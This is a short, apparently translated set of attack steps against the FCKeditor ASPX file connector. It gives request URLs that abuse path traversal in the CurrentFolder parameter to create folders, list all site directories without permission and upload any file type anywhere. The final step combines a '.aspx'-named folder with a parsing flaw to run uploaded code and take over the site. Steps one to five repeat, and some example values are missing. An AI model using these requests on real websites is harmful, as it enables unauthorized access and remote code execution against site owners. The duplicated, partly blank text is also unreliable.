1 CurrentFolder parameter, you can create new folders in different directories in the website, use ../../ to tamper with the parameters and enter different directories.
/browser/default/connectors/aspx/?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=
2 CurrentFolder parameter, according to the returned XML information, you can view all directories of the website, such as "../../../" to enter different directories, so that the message returned through XML can see the page without permission browser/default/connectors/aspx/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 When uploading a file, you can upload the file to a different directory by modifying the CurrentFolder parameter.
/browser/default/connectors/aspx/?Command=FileUpload&Type=Image&CurrentFolder=%2F
4 Modify the Type and CurrentFolder parameters at the same time, and you can upload any type of files to any directory of the website, and the website is basically done.
/browser/default/connectors/aspx/?Command=FileUpload&Type=Image&CurrentFolder=%2F
/upload/fckroots/Image//
5 Through the function of creating a folder, create a folder with a name of .aspx, such as: etc., to take advantage of file resolution vulnerabilities, upload files such as .jpg or .rar with code (the actual file is .aspx, and the file name is suffix) under the folder. After uploading, you can use the vulnerability to execute the code. For example: /upload// after input, the code is successfully executed.
/browser/default/connectors/aspx/?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=
2 CurrentFolder parameter, according to the returned XML information, you can view all directories of the website, such as "../../../" to enter different directories, so that the message returned through XML can see the page without permission browser/default/connectors/aspx/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 When uploading a file, you can upload the file to a different directory by modifying the CurrentFolder parameter.
/browser/default/connectors/aspx/?Command=FileUpload&Type=Image&CurrentFolder=%2F
4 Modify the Type and CurrentFolder parameters at the same time, and you can upload any type of files to any directory of the website, and the website is basically done.
/browser/default/connectors/aspx/?Command=FileUpload&Type=Image&CurrentFolder=%2F
/upload/fckroots/Image//
5 Through the function of creating a folder, create a folder with a name of .aspx, such as: etc., to take advantage of file resolution vulnerabilities, upload files such as .jpg or .rar with code (the actual file is .aspx, and the file name is suffix) under the folder. After uploading, you can use the vulnerability to execute the code. For example: /upload// after input, the code is successfully executed.